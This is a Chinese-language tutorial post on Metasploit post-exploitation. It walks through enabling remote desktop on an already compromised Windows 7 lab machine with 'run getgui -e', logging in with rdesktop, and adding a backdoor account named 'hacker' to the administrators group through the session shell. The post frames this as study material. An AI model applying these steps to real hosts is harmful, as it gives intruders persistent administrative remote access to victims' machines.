一、课前声明
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
二、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?如何远程开启受害者主机的远程桌面连接服务呢?接下来让我们一起学习!
二、资源装备
1.成功拿下的 Win7虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
战略安排
3.1 进入跟已经拿下的Windows7的会话控制界面,如下图所示。
3.2 执行脚本文件,在***者主机远程打开受害者主机的远程桌面服务,如下图所示。
命令:run getgui -e
3.3 在受害者主机查看上条命令的执行结果如何,如下图所示。
步骤:Windows/计算机/系统属性/高级系统设置/远程
如下图可见,成功通过远程命令打开了受害者主机的远程桌面服务。
3.4 查看受害者主机的IP地址,如下图所示。
命令:ipconfig(查看Windows主机的IP地址)
命令:ifconfig(查看linux主机的IP地址)
3.5 利用远程桌面工具连接受害者主机,如下图所示。
命令:rdesktop 受害者主机IP:3389
3.6 如下图所示,进入受害者主机的远程桌面登录界面,选择其他用户登录。
3.7 输入刚才创建的账户信息进行登录,如下图所示。
3.8 出现的错误信息处理,登录失败,如下图所示。
Ps:因为刚才创建的账户信息不属于管理员组,将账户加入管理员组即可解决该错误,请看下面的操作。
3.9 进入受害者Windows主机的dos界面,如下图所示。
命令:shell
3.10 将刚才新建的账户加入管理员组,如下图所示。
命令:net localgroup administrators 用户名 /add
例子:net localgroup administrators hacker /add
3.11 改变控制台乱码问题,如下图所示。
命令:chcp 65001
3.12 再次利用远程桌面登录工具登录即可(具体命令参见3.5)
3.13 如下图所示,远程连接受害者主机成功!
点我学习,如何1天会用KALI LINUX***系统!